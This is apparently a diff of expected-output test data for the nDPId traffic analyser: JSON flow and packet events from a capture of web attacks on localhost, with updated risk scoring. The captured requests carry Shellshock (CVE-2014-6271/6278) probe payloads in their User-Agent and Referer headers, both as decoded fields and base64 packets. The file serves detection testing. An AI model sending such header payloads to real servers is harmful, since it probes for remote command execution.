 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_packet_id":1,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"ts_msec":1576420277458,"pkt":"AAAAAAAAAAAAAAAACABFAAENOM9AAEAGAxp\/AAABfwAAAcVsH5CGwwAaI+XJXIAYAED\/AQAAAQEICp1m\/fqdZv36R0VUIC90ZXN0LmNnaS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":489,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277458,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.cgi.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
